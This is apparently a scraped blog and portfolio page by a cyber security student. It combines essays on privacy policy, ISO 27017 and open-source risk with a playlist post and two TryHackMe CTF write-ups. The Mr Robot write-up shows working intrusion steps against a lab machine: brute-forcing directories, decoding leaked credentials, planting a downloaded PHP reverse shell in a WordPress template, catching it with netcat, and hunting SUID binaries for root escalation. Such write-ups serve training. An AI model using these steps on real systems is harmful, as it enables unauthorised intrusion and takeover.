This is an individual assignment that I did under the Cyber Forensics and Incident Response module when I was in the 4th year 1st semester. The purpose of this assignment is to demonstrate the challenges associated with cloud forensics through a video.

This is an individual assignment that I did under the Machine Learning for Cyber Security module when I was in the 4th year 1st semester. This mini research paper is about the End-to-end implementation of Spam Detection in Email using Machine Learning, Python, Flask, Gunicorn, Scikit-Learn, and Logistic Regression on the Heroku cloud application platform.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu

Academia.edu is a place to share and follow research.

Academia.edu- |

In today's world, email is used in almost every industry, from business to education. Emails can be categorized into two categories: ham and spam. Junk emails, also known as spam messages, are emails that have been designed to harm recipients by wasting their time, computing resources, and stealing their valuable information. It is estimated that spam emails are increasing at a rapid rate. One of the most important and prominent spam prevention techniques is filtering email. Naive Bayes, Decision Trees, Neural Networks, and Random Forests are among the methods used for this purpose by researchers. In this project, I examine the Logistic Regression machine learning model for spam filtering in email by categorizing messages into appropriate groups. This study also compares the techniques based on accuracy, precision, recall, etc. The accuracy level for this project was around 97%. Towards the end, these insights and future research directions, and challenges are outlined. Read more...👇

Spam Email Filtering System

As an information security analyst, email is a very important tool for communication. One important feature to ensure effective communication is spam filtering. How exactly does the spam filtering system work? Is it possible to build a more effective spam filtering system from scratch?

Shehan Sanjula | Spam Detection in Email using Machine Learning

Hi, there! 👋🏻 Here, you can find about one of Shehan’s Machine Learning projects. Shehan Sanjula is an information security enthusiast who is reading a degree in cyber security at Sri Lanka Institute of Information Technology.

Ranasinghe Arachchige Shehan Sanjula

GitHub - ShehanSanjula/Spam-Email-Filtering-System-Public: End-to-end implementation of Spam Detection in Email using Machine Learning, Python, Flask, Gunicorn, Scikit-Learn, and Logistic Regression on the Heroku cloud application platform.

End-to-end implementation of Spam Detection in Email using Machine Learning, Python, Flask, Gunicorn, Scikit-Learn, and Logistic Regression on the Heroku cloud application platform. - GitHub - Sheh...

GitHubShehanSanjula

Spam Detection in Email using Machine Learning

In today's world, email is used in almost every industry, from business to education. Emails can be categorized into two categories: ham and spam. Junk emails, also known as spam messages, are emails that have been designed to harm recipients by

Academia.eduR. A. Shehan Sanjula

The privacy policy is an asset to every organisation. It is the responsibility of organisations to protect the privacy of their employees. It has been a critical term in news media and featured become a target of legislation worldwide in recent years. Most organisations have been facing lawsuits because of errors in their privacy policy mechanisms by today. This article presents a brief overview of such violations and how to overcome them by implementing a proper privacy policy for the organisation. As far as I am concerned, a well developed and implemented privacy policy protects the organisation and their resources and stakeholders effectively. This article briefly examines the statistics, significance and strengths and weaknesses and recommendations when implementing a privacy policy for an organisation. By providing such views, I encourage the reader to understand privacy policy implementation in an organisation in a better way.

Keywords: privacy policy, history, statistics, significance, strengths and weaknesses,  recommendations

An overview of the privacy policy implementation in organisations

Every day, an unimaginable amount of data flows from the workplace to the Internet and vice versa. Each piece of this data leaves behind electronic devices contains trails of various user activities such as everyday conversations with people, sensitive personal information, and monetary transactions. It allows organisations to understand employee/customer behaviours and preferences when properly collected this sort of data and information after storing and processing. The way an organisation manages the personally identifiable information that it gathers and uses during the regular business course, as discussed before, and how they have written, published statements explain the organisation’s policy position on this matter. It can also be described as the privacy policy.

However, the privacy factor remains the most prominent issue that must be solved in how companies could access, collect, process, use, analysis, share, and dissemination such private information of their employees. This concern has come to attention since there have been incidents regarding privacy invasion and online information leaks with increasing cases over the years. As far as we are concerned about privacy policy violations, those incidents have brought adverse effects even for well-recognized companies in the world. Ultimately, those organisations had to pay fines against lawsuits as the price.

To prevent such violations and penalties, organisations tend to monitor employee communications carefully. When they implement policies for such actions, most employees have their staff and organisation in mind while achieving common goals for the organisation. It has been noticed that the privacy of employees is the priority in these topics. At its core, they believe in the need for security and safety in such situations.

When it comes to the privacy policy implementation at the workplace, Nancy Flynn, the Executive Director of the ePolicy Institute, states that,

To help control the risk of litigation, security breaches and other electronic disasters, employers should take advantage of monitoring and blocking technology to battle people problems—including the accidental and intentional misuse of computer systems and other electronic resources.

Knowing that there is always someone watching, and what could be monitored and what types of surveillance technologies exist can motivate someone to have their best at the workplace as the outcome of it.

Types of technologies that can be used to surveillance at the workplace:

• CCTV
• Background check software
• Biometric technology (facial recognition, fingerprints, and voice recognition, etc.)
• Modern cloud-based access control platforms
• Real-time location tracking (to monitor company assets and endpoint devices within a network)
• Social Media Monitoring software (SMMs)
• Identity management systems
• Occupancy tracking (A series of sensors that can be used to measure the presence of the number of people and the amount of time they spend in a specific area at the workplace)
• Screen capture/browser monitoring
• Workplace analytics audit logs

According to Privacy Rights Clearing House, here is the list of things that an organisation is generally permitted to monitor in the workplace:

The “2007 Electronic Monitoring & Surveillance Survey”, which was co-sponsored by American Management Association and the ePolicy Institute, mentioned a long list of privacy policy violations at organisations in their report. Among them, 64% of employees violated company policies under the title of "any company policy violation" in the category of Email and Internet-Related Terminations. Not only employees who violate company policies but also it has come to attention that 48% of bosses violated company policies under the title of "any company policy violation", in the category of Email and Internet-Related Terminations.

They also included in their report that "45% of employers tracking content, keystrokes, and time spent at the keyboard, 43% store and review computer files, 12% monitor the blogosphere to see what is being written about the company and 10% monitor social networking sites". After all, it falls under the category of Computer monitoring forms at the organisation.

So, it is evident that there are several things to consider to implement a better privacy policy. Ultimately, a well-documented privacy policy should consider all the above requirements and protect the organisation and the individuals who affect them. It will also start promoting the organisation to earn the public trust for the company automatically.

Strengths of privacy policy implementation

• Having a privacy policy implemented into your organisational structure can play a vital part if you or your organisation collect, gather, process, and store or manipulate customer data because it’s a legal requirement to collect personal information.
• If the organisation uses any third-party application or service, they also require a privacy policy implemented into your organisation.
• One of the main reasons is that if users are concerned about their privacy, they can have a clear idea about what information the organisation or service collects or processes and clarify that they do further business with the organisation.

Weaknesses of privacy policy implementation

• One of the main things that can happen with privacy policy implementation is that it’s not appropriately documented, including guidelines and procedures. This information about privacy policies should be accessible and adjustable in case of change.
• Even though privacy policy has various connections all over the business, most businesses only connect privacy policy into their IT security structure or the plan for disaster recovery.
• Usually, when technology is updated rapidly over time, organisations do not update their privacy policy with the changes. Updating privacy policies and new implementations according to changes of privacy laws does not happen very often with most organisations.
• When it comes to new implementations, the Internet of Things (IoT) and Bring-Your-Own-Device (BYOD) are harder to implement generally because it connects almost all the devices to the internet and has a vast amount of data to manage and process.
• Most organisations apply the same privacy policy to all types of data that are insufficient to cover and manage those categories.
• After implementing privacy policies, organisations need to monitor and maintenance privacy policy implementations without being breached. Since maintenance costs increase with the economy, organisations decide to automate processes instead of working with the workforce, reducing costs, improving control and governance, lack of human errors, and increased efficiency.

Recommendations for privacy policy implementation

• Do not use only legalese language.

One of the characteristics of a poor privacy policy is the use of legalese. The practice was (and continues to be) so widespread that the European privacy law - the GDPR - went to great lengths to make it clear that privacy policies written in non-plain language are in breach of the law. Transparency is the ultimate goal of a privacy policy.

• Update privacy policy to match your data practices.

Regularly update the policies to the current practices. If you constantly update your privacy policy, you should inform your users via a privacy policy update notice and ask for consent a second time. Conduct a privacy law self-audit to make sure you have a good grasp of your business’s current privacy practices so you can accurately convey it in your privacy policy and update your policy if needed.

• Do not miss essential clauses.

Privacy policy needs to strategically represent each of the ways you collect, use and store data. Businesses often miss out on some of the clause’s legislative clauses listed above, such as the need to comply with the GDPR or COPPA.

There might be other clauses missing that result in the privacy policy being incomplete. These often relate to moving or sharing your data with a third party. For example, if you transfer data to another country, you need to say so in your privacy policy. You mainly need this clause if you must comply with the GDPR. Another essential clause frequently missed by privacy policies is the business transfer clause. It states that you will pass the database and its contents over to the new owner if you sell your business. Even if you don't plan to market your business, you benefit from having this clause.

• Do not write an enormous block of text.

Not making a privacy policy easily readable is one of the organisations’ biggest mistakes when constructing their policies. Too many still use a 2000s-era format: big words, tiny print, and enormous and almost illegible blocks of text. Readability is increasingly governed by law, and in cases where you market to children, you need to provide a privacy policy they can read.

• Do not use one privacy policy for different users.

Organisations may have several different types of users: customers, developers, and partners. The way you use data changes based on how they use your service. So, your privacy policy needs to reflect accordingly. Including all three user categories in a single privacy policy makes your document long, complicated, and virtually unreadable. To make it simple, you need a policy for each of your critical categories of customers.

Use separate privacy policy for:

• Customers
• Partners
• Developers
• General users ("Everyone")

Each privacy policy is found under its respective heading to clarify what data practices occur at each level.

• Update employees about what's in your privacy policy.

You have a privacy policy, and it reflects your data practices on paper. But does your team know what's in your privacy policy, and more importantly, does their lack of knowledge impact whether you uphold each clause as you should? Everyone who controls, processes, or accesses your data needs to know what's in your privacy policy, how it matches your operations, and what your consumers expect from you. It makes the privacy policy document more than just a paper and actual authentic practice and reflection of your professional methods.

So, we’ve come to the end of our article. I think you have learned something from this article regarding what you might need to consider when implementing a privacy policy in organisations.

Thank you, and let’s meet with another piece of paper. Until then, stay safe and bye 👋.

References

[1] "Justice Information Sharing | Bureau of Justice Assistance", Bureau of Justice Assistance, 2006.

[2] Y. Chang, S. Fan Wong and H. Lee, "Understanding Perceived Privacy: A Privacy Boundary Management Model", Core.ac.uk, 2015.

[3] S. Cox, T. Goette and D. Young, "Workplace Sur orkplace Surveillance and Emplo eillance and Employee Priv ee Privacy: Implementing an acy: Implementing an Effective Computer Use Policy", Scholarworks.lib.csusb.edu, 2005.

[4] "The State of Employee Privacy and Surveillance in 2021 | Kisi", Getkisi.com, 2021.

[5] "The Latest on Workplace Monitoring and Surveillance", Amanet.org, 2021.

[6] . Hugl, Ulrike, "Approaching the value of Privacy: Review of theoretical privacy concepts and aspects of privacy management" AMCIS 2010 Proceedings. 2010.

[7] . Kint, B., "5 Ways Your Company’s Privacy Policy Could Be Insufficient" Corporate Compliance Insights. 2019.

[8] . Cloverdx.com. "The 8 Most Challenging Data Privacy Issues (and How to Solve Them)". 2020.

[9] . Kint, B., "5 Ways Your Company’s Privacy Policy Could Be Insufficient." Corporate Compliance Insights. 2019.

[10] . S. Sanjula, S. Fonseka, S. Wijeveera, I. Anjana, U. Madushantha, "Privacy Policy implementation in organisations", ISPM. 2021.

Acknowledgement

I thank Mr Kanishka Yapa, (Sri Lanka Institute of Information Technology) the lecturer in charge, for granting us a chance to conduct this toolkit implementation with guidance. This work was supported in part by the Research Groups Faculty of Computing, Department of Computer Systems Engineering under Grant Enterprise Standards for Information Security - IE3102.

A brief overview of ISO 27017

This security standard provides guidelines for information security controls applicable to the provision and use of cloud services. The objectives of operations security are to support the planning and sustaining of day-to-day processes that are critical concerning the security of information environments. As the name suggests, this is a standard related to cloud services.

Actually, it is an extension of ISO-27002 incorporating clauses specific to information security in the context of the cloud. This standard provides guidance on the information security aspects of cloud computing, recommending and assisting with the implementation of cloud-specific information security controls supplementing the guidance in ISO/IEC 27002 and other ISO27k standards such as ISO 27001, etc.

The cloud service customers and the cloud service providers can refer to ISO/IEC 27002 and this Recommended International Standard ISO/IEC 27017 to select controls with the implementation guidance, and add other controls if necessary. This process can be done by performing an information security risk assessment and risk treatment in the organizational and business context where cloud services are used or provided. So, that's the basic understanding of the ISO 27017 standard.

Since It's a lengthy process, I'm not planning to discuss the implementation process from top to bottom here. Nevertheless, you can get a clear idea by referring above slides. You can send me an email requesting ISO/IEC 27017 toolkit. It includes Documentations, Excel workbooks and Presentations of the Guidance video, Business case, SOA, Checklist, DR, Policy,... and so on.

Stay with the Blog of Shehan for more updates!

Based on the Mr. Robot show, can you root this box?

TryHackMe is an amazing platform to learn cyber security and it’s an amazing asset if you are new to it and don’t know where to start. They have something called rooms that are basically vulnerable machines that you can deploy and practice your skills.

The best part about TryHackMe is that it’s pretty hands-on. If you are new to security, make sure you give it a try. In this article, we are going to solve the Mr Robot CTF from TryHackMe. This room has three flags to retrieve from the target. 🙂

Difficulty: Medium

1. Connect to TryHackMe network

To deploy the Mr Robot virtual machine, we will first need to connect to the TryHackMe network. In this write-up, I am going to use the OpenVPN client to connect.

Go to your access page and download your configuration file.

After downloading the .ovpn file, now we can create our OpenVPN session.

sudo openvpn CONFIG_FILE_NAME.ovpn

After running this command, you'll get an output like below.

2021-xx-xx xx:xx:xx Initialization Sequence Completed

It means that you have successfully connected to TryHackMe through the VPN connection. You can verify it by navigating to the TryHackMe access page.

Enough talks 🥱, let's get started to hack. 🐱‍💻

2. Start the Machine

Now, click on the Start Machine button mentioned on TryHackMe task 2.

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

Enumeration

As always, let's start with the Nmap scan.

nmap -sC -sV 10.10.xxx.xxx

-sC	: Launch default NSE nmap scripts
-sV	: Service fingerprinting

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-xx-xx xx:xx EDT
Nmap scan report for 10.10.xxx.xxx
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.97 seconds

Nmap reveals 03 ports, 2 of which are opened (HTTP and HTTPS). And SSH seems to be closed.

Getting the first key

Now that we know the target is running a webserver, We should do a directory brute force scan to see what’s available. You can use gobuster or dirb but I like to use dirbuster. (In the following steps, I will show you how to do it through both dirbuster and gobuster)

Similar in concept to password brute-forcing we are taking a list of words contained in a file and using them as search queries against the webserver. If it returns a 20x or 30x status code then we know something is there.

Using dirbuster:

You can run dirbuster command on your terminal. It'll open dirbuster GUI, and now you can enter target information to scan as follows.

After 3rd step, you can wait for the scan to be completed and eventually you can generate a report.

Using gobuster:

gobuster dir -u 10.10.xxx.xxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Even though these processes could take some time, if you prefer to see the hint on TryHackMe, then you can guess the file/path without putting much effort using a directory traversal tool.

However, Assisted by the hint, let’s go and see what's inside the robots.txt file. It discloses 02 hidden files, 1 of which is key 1. (073xxxxxxxxxxxxxxxx)

The second file is a dictionary, that we will probably need to use for the discovery of other locations.

┌──(shehan㉿shehansanjula)-[~/TryHackMe/Mr Robot CTF]
└─$ curl -s http://10.10.xxx.xxx/fsocity.dic | head
true
false
wikia
from
the
now
Wikia
extensions
scss
window

Getting the second key

gobuster has discovered several locations, including:

• /login (Status: 302)
• /wp-content (Status: 301)
• /admin (Status: 301)
• /wp-login (Status: 200)
• /license (Status: 200)
• /wp-includes (Status: 301)
• /wp-admin (Status: 301)

By examining some directories, I find out the directory /license discloses some credentials:

curl -s http://10.10.xxx.xxx/license | tr -d "\n"                   

tr	-> translate or delete characters
-d	-> delete characters in SET1, do not translate
\n	-> new line

Here is the output 👇

Seems like we have base 64 encoded string. 🧐

echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d

Here is the output 👇

elliot:ER28-0652

If you have seen the Mr Robot TV series, probably you would have identified who that is. 🤖 Yeah, that's Elliot!

Let's check these credentials against WordPress login.
Well, it worked. 🤠 We just got access to the WordPress dashboard panel.

The WordPress version is 4.3.1. Considering the current version is 5.8.1, we are likely to find vulnerabilities.

After snooping around a bit, I found out Elliot is an administrator of this website. As we are administrators, we can modify the templates.

First download the script:

wget https://raw.githubusercontent.com/ShehanSanjula/php-reverse-shell/master/php-reverse-shell.php

Go to Appearance > Editor and edit the first template (404.php) by replacing the PHP code with a reverse shell taken from trusty PentestMonkey. Make sure you put your VPN interface IP

Type ifconfig tun0 and replace IP and port (you can specify any port you are using for the creation of your reverse TCP shell).

If you are using an Uncomplicated Firewall, remember to add a rule for your port.

After replacing 404 code, now hit update on WordPress. To listen to the connection, I always use the swiss army knife (netcat) tool. 👽

Now open a listener:

nc -lvnp 443

-l	-> listen mode
-v	-> verbose
-n	-> numeric-only IP addresses, no DNS
-p	-> local port number

Now visit http://10.10.xxx.xxx/404.php to open the reverse shell.

We can see our next key in /home/robot but it is only readable by the robot user.

We are also provided with the MD5 hash of Mr Robot’s password:

$ cd /home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

After reversing this MD5 hash, we can get the string abcdefghijklmnopqrstuvwxyz

It could be the associated password. So, let’s try to log in as robot.

$ su - robot
su: must be run from a terminal

Well, we got an error... 😈 Fine, let's check and confirm whether python is installed. So, then we can spawn a shell with python. 😇

$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot 
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822xxxxxxxxxxxxxxxxxxxx
$ 

Getting the third key

Our last key is very likely in the /root directory, and we will need a privilege escalation to access it.
The Nmap scan reveals that port 22 (ssh) is closed, probably because the service is not started. We need to elevate our privileges.
Unfortunately, our user robot is not in the sudoers:

The /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands.

$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.
$ 

No need to worry, let’s find what programs we have with the SETUID bit set owned by root:

$  find / -user root -perm -4000 -print 2>/dev/null

 find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Like I guess, Nmap is on the list (it’s also the hint btw). 😋

Besides, it’s a very old release (3.81), considering that the current release is 7.92 at the time of this writing.

$ which nmap
which nmap
/usr/local/bin/nmap
$ nmap --version
nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

Nmap's older release (2.02 to 5.21) had an interactive mode that allows executing commands.
However, Nmap has the SETUID bit set, which means that we will be able to run commands as root:

$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

setuid: a bit that makes an executable run with the privileges of the owner of the file

setgid: a bit that makes an executable run with the privileges of the group of the file

sticky bit: a bit set on directories that allows only the owner or root can delete files and subdirectories

Let’s play with Nmap's interactive mode:

Okay... I’ll see you on another room! 🙋‍♂️

Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️

You can find my articles from SLIIT FOSS Community - Blog as well. 👨‍💻

Cloud customers are concerned about security—it remains a key reason why organizations hesitate to adopt cloud services despite the flexibility and scalability the cloud can offer. A key concern focuses on the ability of Cloud Service Providers (CSPs) to treat customer data with sufficient care and attention.

The main elements of this are the worries that data could end up in the wrong hands and what control does a customer have over careless operators. But there are other concerns too: issues such as customer identity, segregation of assets on virtual servers and what happens to assets in the event of a CSP going out of business are also issues that play on potential cloud users’ minds.

The ISO 27001 series addresses some of these concerns but a new standard, ISO/IEC 27017 Information technology — Security techniques, goes further and offers more peace of mind for potential cloud customers. Typical cloud standards and technical standards that address the cloud provider controls and guidance aimed at the cloud service provider. What’s unique and extremely helpful about ISO/IEC 27017 is that it provides both the CSP and cloud service customer with guidance and advice. In addition to ensuring services are safe, ISO/IEC 27017 also aims to educate customers on what they should want from their host in the cloud.

The standard provides cloud-based guidance on 37 of the controls in ISO/IEC 27002 but also features 07 new controls.

• CLD.6.3.1: Agreement on shared or divided responsibilities between the customer and provider around information security roles associated with cloud services have to be clearly laid out, recorded and communicated.
• CLD.8.1.5: Addresses how assets are returned or removed from the cloud when the contract/ agreement between the customer and provider is terminated.
• CLD.9.5.1: The provider has to protect and separate the customer’s virtual environment from other customers and external parties.
• CLD.9.5.2: The customer and provider must ensure virtual machines are configured and hardened to meet the needs of the organization.
• CLD.12.1.5: The customer’s responsibility to define, document and monitor the administrative operations and procedures associated with the cloud environment and the CSP’s requirement to share documentation about critical operations and procedures as and when customers require it.
• CLD.12.4.5: How the capabilities of the provider enable the customer to monitor activity within a cloud computing environment.
• CLD.13.1.4: Consistent configurations should be made so that the virtual network environment is in line with the information security policy of the physical network.

Roles and responsibilities

Ambiguity in roles and the definition and allocation of responsibilities related to issues such as data ownership, access control, and infrastructure maintenance can give rise to business or legal disputes; especially when dealing with third parties. As the standard states:

Data and files on the cloud service provider's systems created or modified during the use of the cloud service can be critical to the secure operation, recovery and continuity of the service. The ownership of all assets, and the parties who have responsibilities for operations associated with these assets, such as backup and recovery operations, should be defined and documented. Otherwise, there is a risk that the cloud service provider assumes that the cloud service customer performs these vital tasks (or vice versa), and a loss of data can occur.

Essentially, the standard requires that it’s clearly laid out which party is responsible for what from the outset.

Security controls

It’s not only the separation of responsibilities that the standard helps define: ISO/IEC 27017 also goes into much more detail about the type of security controls that service providers should be implementing – helping reduce the barriers to cloud adoption.

ISO/IEC 27017 offers a way for cloud service providers to indicate the level of controls that have been implemented. This means documented evidence—backed up by independent sources like certification to certain standards—show that appropriate policies have been implemented and, most importantly, what types of controls have been introduced. This information should be shared with the cloud customer before any contract is signed to help alleviate any potential issues in the future.

In cases where independent audits aren’t practical or would pose a greater risk to information security, the standard does provide an option for CSPs to self-assess. When this is the case, the CSP must tell customers that they have self-assessed.

Cryptography

There’s also guidance about any cryptography being used. This applies to the customer and the provider as both have responsibilities in this area. The provider should tell the customer how it’s using cryptography and help customers apply protection of their own. It should also consider special cases, such as health data, where they may be some additional regulatory guidelines.

Customers should also be upfront about the type of cryptography that they’re using – and they ought to be using cryptography if the risk analysis suggests that it’s needed. In fact, this is the sort of dispute or misunderstanding that underpins the need for the standard. Not only should both parties assure each other that the network is being protected, but they should also be able to assure each other that the two systems are compatible. And, crucially, it should be determined whether these controls apply to data at rest, in transit or both, as this has caused misunderstandings before.

Customer relationship

The standard extends requirements beyond technology and also lays out guidelines for training. Many customers are happy about cloud providers’ infrastructure but are wary about the level of support.

There is, after all, plenty of evidence to suggest employees are often the weak point in any organization’s security measures. It’s not just faulty security devices that customers need to be wary of, but rather whether staff are following all of the appropriate measures. The new standard not only sets out that providers should be supplying awareness and training for employees and contractors, but also stipulates that the training should cover regulatory requirements, customer access and specific requests.

Asset ownership

Who owns what in the cloud can be a point of confusion. The standard suggests that there be an inventory made of assets that are stored in the cloud and also refers back to the guidance information specified in ISO/IEC 27002 on the ownership, acceptable use of and return of assets. The new standard also lays out parameters for the safe disposal of customer assets so that sensitive data isn’t simply dumped in virtual dustbins.

Who benefits?

The simple answer is: everyone. Well everyone associated with the cloud.

The road to the cloud can be paved with misunderstandings and apprehension. Any organization entrusting sensitive customer data to a third party has come to know there are grey areas where rights and responsibilities have not been clearly defined. There’s a lot that’s been taken on trust and that’s not necessarily the best recipe for success.

CIOs and IT managers will be encouraged by the changes to their relationships with CSPs supported by the standard as they introduce a real degree of assurance to cloud computing security. Overview and implementation training around ISO/IEC 27017 may prove to be very helpful as an organization makes decisions about adopting cloud and which partners are suited to their needs.

CSPs that choose to implement ISO/IEC 27017 will also benefit by knowing they’re offering a secure solution that their customers can trust, which goes a long way in building a cloud-based relationship. And, of course, by working with their customers through their adoption process ISO/IEC 27017 protects themselves from harmful accusations or lawsuits that may disrupt their business and damage their brand.

Source:
The British Standards Institution, "ISO/IEC 27017" | bsigroup.com

As you know, I have been serving as an official Musixmatch curator for Sri Lanka for quite a long time now.

Shehan Sanjula’s profile on Musixmatch

description

Musixmatch logo

Apart from being an active member of the Musixmatch platform, I always wanted to contribute to society. As a result, I made a public playlist that contains the best songs of all time. It will save the time that you used to search top music albums. And it's free... you just need to follow the playlist! 😉

In here I categorized 🔥 these songs according to the following terms... 👇

• 👉 Most listened 👈 🤗
• 👉 Most viewed 👈 😋
• 👉 Most popular 👈 😍
• 👉 Top-rated 👈 🤠 and also according to the Top Rankings in popular music streaming sites (Musixmatch, Deezer, Pandora, Spotify, AppleMusic, YouTube Music, SamsungMusic, etc. 🎧)

✔️ There might be some popular songs you never heard before. 😮
✔️ So, I recommend checking out all these Music albums. 😊 🎶
✔️ These songs are mostly related to English, Latin, Spanish & Korean languages. 😎

#TopSongsEver #ShehanSanjula

#MostPopular #MostListened #MostViewed #TopRated #Spotify #Deezer #Pandora #Musixmatch #AppleMusic #SamsungMusic #YoutubeMusic

Open-source components are becoming major building blocks of the application economy. The software giants have moved into the open-source community in ways that were never previously imaginable. Microsoft loves Linux, IBM bought Red Hat, Oracle became the steward of the open-source Java platform and language… the list goes on. On the top of this ladder, companies like Google, Adobe, Oracle, Microsoft are some of the biggest supporters of open-source software. They have contributed to a range of open-source projects over the years.

Open-source software is a rapidly growing market. It is mainly because of its features. It allows any user to access the particular programming code. The user can get an idea of what the code’s functionality does by examining the source code. Apart from that, even users can modify the code to fit specific requirements or contribute to making the code even better.

‘Total global revenue in the open-source services market will reach over 17 billion U.S. dollars in 2019 and is expected to grow into a 30-billion-dollar industry by 2022, a number which would represent a tripling in size over the span of just five years.’ source:Statista

According to a WhiteSource survey titled “The State of Open Source Vulnerabilities Management,”

• 96.8% of developers reported that they use open-source components “all the time”, “very often” or “sometimes.”
• Only 3.2% of developers reported that they did not use open source at all since some companies do not allow them to do so in their organizations due to policies.
• Almost 97% rely on open-source components significantly, which explains why no one responds to their usage as “rarely.”

Now, let’s find out what the 2021 OSSRA report tells us about the state of open source in commercial software!

“The 2021 Open-Source Security and Risk Analysis” (OSSRA) report, produced by the Synopsys Cybersecurity Research Center (CyRC), examines the results of more than 1,500 audits of commercial codebases, performed by the Black Duck® Audit Services team.

The pandemic has involved explosive growth in both apps and vulnerabilities 📈

As result of the COVID-19 pandemic, it has impacted the growth of mobile app downloads rapidly. It has also increased the corresponding likelihood that open-source vulnerabilities will be present in those apps. The “Peril in a Pandemic: State of Mobile Application Security” report shows that the number of open-source vulnerabilities increased in the audits reported in the 2021 OSSRA, and that increase is especially pronounced when looking at industry breakdowns.

Here are some critical insights from the 2021 OSSRA report:

• 95% of the marketing tech codebases also contained open-source vulnerabilities.
• 71% of the audited retail and e-commerce codebases contained vulnerabilities.
• As far as we know from the 2020 IBM’s cost of a data breach report, the healthcare sector moved into the top spot as the most attacked industry over the years. After all, OSSRA confirms that both the financial services/fintech and the healthcare industry sectors had codebases with open-source vulnerabilities exceeding 60%.

No software is perfect… All computer software, whether open source or proprietary, has had bugs, currently have bugs, and will continue to have bugs — but we can minimize the volume and the severity of the bugs present, as well as their impact on the users or the business.

In the end…

The digital transformation we are witnessing today is almost because of the power of open-source components. Companies of all sizes, in all industry verticals, tend to use open source to their infrastructure at some point. Yet, all that great power comes with great responsibility. Acknowledging these risks should be the first step, and investment and maintenance for Open-source security should keep continuing well. It includes continuous security testing and monitoring.

So, we came to the end of our article. I think you will learn something from this article regarding the open-source components and their security. Thank you and let’s meet with another article. Stay safe and Bye 👋.

Attacktive Directory - 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?

In this article, we are going to solve the Attactive Directory vulnerable machine from TryHackMe. This room has numbered several tasks to follow. So, we'll follow them one by one. However, I give you some points to read & understand just a little more about the further steps inside the challenge and the way I solved it. This room has three flags to retrieve from the target. 🙂

Difficulty: Medium 

Basic overview

Active Directory (AD) is a Microsoft technology used to manage computers and other devices on a network. It is a primary feature of Windows Server, an operating system that runs both local and Internet-based servers. Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server.

The Active Directory structure includes three main tiers:

1. domains
2. trees
3. forests

Several objects (users or devices) that all use the same database may be grouped into a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.

Active Directory provides several different services, which fall under the umbrella of Active Directory Domain Services, or AD DS. These services include:

1. Domain Services – stores centralized data and manages communication between users and domains; includes login authentication and search functionality.
2. Certificate Services – creates, distributes, and manages secure certificates.
3. Lightweight Directory Services – supports directory-enabled applications using the open (LDAP) protocol.
4. Directory Federation Services – provides single-sign-on (SSO) to authenticate a user in multiple web applications in a single session.
5. Rights Management – protects copyrighted information by preventing unauthorized use and distribution of digital content.
6. DNS Service – Used to resolve domain names.

Enough talks 🥱, let's get started to hack. 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤 However, for educational explanation purposes, I had to reveal some answers to the given questions.

The first two tasks are about setting up the environment for the attack, and the remaining six are actual Enumeration to Exploitation to Escalation to Flag retrieval. If you have already connected to the target machine & installed Impacket, Bloodhound and Neo4j on your Kali machine, please skip task 1 & task 2 and directly move to task 3.

Task 1 - First Things First

Deploy the target machine. (This machine might take up to 3–5 minutes to load and be accessible)
There are two ways to access the deployed target machine.

1. Use the AttackBox provided by TryHackMe. It might consist of all the necessary tools available for attacking.
2. Use the OpenVPN configuration file to connect your machine (Kali Linux) to their network.

For the sake of demonstration, I am using an OpenVPN connection on my Kali Linux machine.

Task 2 - Setup the environment

Here we are going to install some tools that are mention in task 2.

Installing Impacket:

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library. source: https://github.com/SecureAuthCorp/impacket

First, you will need to clone the Impacket Github repo onto your box. The following command will clone Impacket into /opt/impacket:

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

